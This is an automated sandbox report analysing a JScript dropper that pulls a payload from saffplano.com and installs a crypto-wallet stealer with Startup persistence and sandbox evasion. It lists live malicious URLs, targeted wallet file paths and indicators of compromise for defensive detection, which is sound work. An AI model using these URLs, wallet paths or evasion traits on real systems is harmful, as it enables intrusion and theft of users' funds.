        Source: visionApps.exe, 0000000A.00000002.2944884298.00000000045D7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 0C:\Users\user\AppData\Roaming\Electrum\wallets
        Source: visionApps.exe, 0000000A.00000002.2937197760.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbl
        Source: visionApps.exe, 0000000A.00000002.2944884298.00000000045F5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.walletp]_
        Source: visionApps.exe, 0000000A.00000002.2944884298.00000000045D7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore
        Source: visionApps.exe, 0000000A.00000002.2944884298.00000000045F5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.walletp]_
        Source: visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ethereum
        Source: visionApps.exe, 0000000A.00000002.2944884298.00000000045F5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsp]_
        Source: powershell.exe, 00000006.00000002.1916021180.00007FFB54980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
        Source: Yara matchFile source: Process Memory Space: visionApps.exe PID: 8464, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information22
        Scripting        		Valid Accounts1
        Exploitation for Client Execution        		22
        Scripting        		12
        Process Injection        		11
        Masquerading        		OS Credential Dumping621
        Security Software Discovery        		Remote Services1
        Data from Local System        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts4
        PowerShell        		12
        Registry Run Keys / Startup Folder        		12
        Registry Run Keys / Startup Folder        		441
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Process Discovery        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Services File Permissions Weakness        		1
        Services File Permissions Weakness        		12
        Process Injection        		Security Account Manager441
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCron1
        DLL Side-Loading        		1
        DLL Side-Loading        		3
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture14
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Services File Permissions Weakness        		LSA Secrets2
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
        Software Packing        		Cached Domain Credentials13
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582880 Sample: OPRfEWLTto.js Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 37 saffplano.com 2->37 41 Suricata IDS alerts for network traffic 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 5 other signatures 2->47 9 wscript.exe 1 1 2->9         started        12 visionApps.exe 2->12         started        signatures3 process4 signatures5 61 JScript performs obfuscated calls to suspicious functions 9->61 63 Suspicious powershell command line found 9->63 65 Wscript starts Powershell (via cmd or directly) 9->65 75 2 other signatures 9->75 14 powershell.exe 14 31 9->14         started        67 Query firmware table information (likely to detect VMs) 12->67 69 Hides threads from debuggers 12->69 71 Tries to detect sandboxes / dynamic malware analysis system (registry check) 12->71 73 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 12->73 process6 dnsIp7 39 saffplano.com 104.21.75.126, 443, 49713, 49714 CLOUDFLARENETUS United States 14->39 77 Suspicious powershell command line found 14->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 14->79 81 Powershell creates an autostart link 14->81 83 2 other signatures 14->83 18 powershell.exe 51 14->18         started        22 conhost.exe 14->22         started        signatures8 process9 file10 33 C:\Users\user\AppData\...\visionApps.exe, PE32 18->33 dropped 35 C:\Users\user\AppData\Roaming\...\app.lnk, MS 18->35 dropped 49 Found many strings related to Crypto-Wallets (likely being stolen) 18->49 51 Loading BitLocker PowerShell Module 18->51 24 visionApps.exe 1 18->24         started        27 conhost.exe 18->27         started        29 WmiPrvSE.exe 18->29         started        31 icacls.exe 1 18->31         started        signatures11 process12 signatures13 53 Antivirus detection for dropped file 24->53 55 Multi AV Scanner detection for dropped file 24->55 57 Query firmware table information (likely to detect VMs) 24->57 59 7 other signatures 24->59

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        OPRfEWLTto.js26%ReversingLabsWin32.Trojan.Boxter

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\App_86026\visionApps.exe100%AviraTR/Crypt.ZPACK.Gen
        C:\Users\user\AppData\Roaming\App_86026\visionApps.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\App_86026\visionApps.exe65%ReversingLabsWin32.Trojan.Midie

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://saffplano.com/fsp/visionApps.zip0%Avira URL Cloudsafe
        https://saffplano.com/fsp/contador/0%Avira URL Cloudsafe
        https://saffplano.com/download/uploads/eERu1UrKpkUv.txt0%Avira URL Cloudsafe
        https://saffplano.com0%Avira URL Cloudsafe
        http://crl.microsoft.960%Avira URL Cloudsafe
        http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia0%Avira URL Cloudsafe
        http://pki-ocsp.symauth.com00%Avira URL Cloudsafe
        http://crl.microsoft.co0%Avira URL Cloudsafe
        https://saffplano.com/download/uploads/kcivs6w55td9u.txt0%Avira URL Cloudsafe
        http://www.indyproject.org/0%Avira URL Cloudsafe
        https://saffplano.com/fsp/visionApps.zipXz0%Avira URL Cloudsafe
        https://saffplano.com/download/uploads/eERu0%Avira URL Cloudsafe
        https://saffplano.com/fsp/contador/Xz0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        saffplano.com
        		104.21.75.126
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://saffplano.com/download/uploads/KciVS6w55td9u.txttrue
            		unknown
            https://saffplano.com/download/uploads/eERu1UrKpkUv.txttrue
            • Avira URL Cloud: safe
            		unknown
            https://saffplano.com/fsp/contador/true
            • Avira URL Cloud: safe
            		unknown
            https://saffplano.com/fsp/visionApps.ziptrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl07visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpfalse
              		high
              https://saffplano.compowershell.exe, 00000006.00000002.1879594049.0000023580E7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://saffplano.com/download/uploads/kcivs6w55td9u.txtpowershell.exe, 00000006.00000002.1904197026.00000235EE730000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.indyproject.org/visionApps.exe, 0000000A.00000003.1868471357.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000A.00000002.2944884298.00000000045EE000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000A.00000002.2937512778.0000000000B61000.00000020.00000001.01000000.00000008.sdmp, visionApps.exe, 0000000D.00000002.1983473944.000000000503E000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000003.1952759401.0000000003350000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1972511676.0000000000B61000.00000020.00000001.01000000.00000008.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMediavisionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlXzpowershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.microsoft.96powershell.exe, 00000006.00000002.1910671628.00000235F0B80000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pki-ocsp.symauth.com0visionApps.exe, 0000000A.00000003.1869195892.0000000004645000.00000004.00001000.00020000.00000000.sdmp, visionApps.exe, 0000000D.00000002.1973904271.0000000001025000.00000002.00000001.01000000.00000008.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.microsoft.copowershell.exe, 00000006.00000002.1907146380.00000235F082C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://saffplano.com/fsp/visionApps.zipXzpowershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.1899444286.0000023590077000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://saffplano.com/download/uploads/eERuwscript.exe, wscript.exe, 00000000.00000002.1634851755.0000014E08090000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1634780078.0000014E068E5000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.quovadis.bm0powershell.exe, 00000006.00000002.1907146380.00000235F07FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/PesterXzpowershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://aka.ms/pscore68powershell.exe, 00000006.00000002.1879594049.0000023580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://saffplano.com/fsp/contador/Xzpowershell.exe, 00000006.00000002.1879594049.00000235803A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ocsp.quovadisoffshore.com0powershell.exe, 00000006.00000002.1907146380.00000235F07FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1879594049.0000023580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://pesterbdd.com/images/Pester.pngXzpowershell.exe, 00000006.00000002.1879594049.000002358022A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.75.126
                                                		saffplano.comUnited States
                                                		13335CLOUDFLARENETUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1582880
                                                Start date and time:2024-12-31 17:57:35 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 51s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:OPRfEWLTto.js
                                                Detection:MAL
                                                Classification:mal100.spyw.expl.evad.winJS@12/16@1/1
                                                EGA Information:Failed
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .js

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                • Execution Graph export aborted for target powershell.exe, PID 6420 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: OPRfEWLTto.js

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                11:59:44API Interceptor90x Sleep call for process: powershell.exe modified
                                                12:00:09API Interceptor4379264x Sleep call for process: visionApps.exe modified
                                                18:00:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\app.lnk

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaCBrowse
                                                • 172.67.157.249
                                                PASS-1234.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.96.1
                                                Loader.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.80.1
                                                Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                • 188.114.97.3
                                                LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.75.163
                                                Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.96.1
                                                Delta.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.96.1
                                                Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.52.90
                                                setup.msiGet hashmaliciousUnknownBrowse
                                                • 188.114.97.3

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0ehttp://4.lkx91.michaelhuegel.com/news?q=IP%20provider%20is%20blacklisted!%20MICROSOFT-CORP-MSN-AS-BLOCKGet hashmaliciousUnknownBrowse
                                                • 104.21.75.126
                                                over.ps1Get hashmaliciousVidarBrowse
                                                • 104.21.75.126
                                                http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                • 104.21.75.126
                                                tyPafmiT0t.exeGet hashmalicious44Caliber Stealer, BlackGuard, Rags StealerBrowse
                                                • 104.21.75.126
                                                vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                • 104.21.75.126
                                                Invoice-BL. Payment TT $ 28,945.99.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                • 104.21.75.126
                                                Statement of Account - USD 16,720.00.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.21.75.126
                                                GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
                                                • 104.21.75.126
                                                6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                • 104.21.75.126
                                                Bp4LoSXw83.lnkGet hashmaliciousUnknownBrowse
                                                • 104.21.75.126

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):60692
                                                Entropy (8bit):5.074521278672331
                                                Encrypted:false
                                                SSDEEP:1536:c91+z307jcbV3CNBQkj2Uh4iUxqaVLflJnPv3HnqdAJuSb7OdBZNGzqtAHkhNKeb:W1+z30ncbV3CNBQkj2UqiUqaVLflJnPw
                                                MD5:1711532FB12A1C406C0C1AAA6921E7A9
                                                SHA1:AFE36835D3FF63AF9484EF36605B3287653D8F48
                                                SHA-256:3AF78CAEFC9DACC139C86DF26EAEF87A1B33E830F72E0A3BEBEA377FA5009FA0
                                                SHA-512:5FD853D793848BCFA841500EB28BD569ACB3DEDC668633288C9B0AA6ECDAA7D4250E0F9E982BA80A2A094701A4FEE30EBD512F0D936D59D7258ADB0226EE2914
                                                Malicious:false
                                                Reputation:low
                                                Preview:PSMODULECACHE.[...K.R..n..I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0rtvfqei.r5y.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3k1elt2a.3pp.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blzmafe5.vfz.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g51k2plt.b2p.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnfqbsy2.3sx.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqf2aedw.zai.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igso1g5t.zwv.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xs00uiyi.wq0.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Roaming\App_86026\arquivo.zip

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):12455089
                                                Entropy (8bit):7.998586851858295
                                                Encrypted:true
                                                SSDEEP:196608:PBTW7TCfhRKScaxp7jF5+OsF/hgVStmii4hmXCMd7z27aerWU9JjUO8Sxww:PNq2fhRHcM7p5+OKsqm74hmXn7z27f9/
                                                MD5:1E323714532C5384405490A8C32D70A7
                                                SHA1:DE9BF466CBF8631C9C1E272F70357BFBA4729BAE
                                                SHA-256:EF48DE3439F5532B853C1881FB71244B6D030FD7DFA105DD04D657FE274E4582
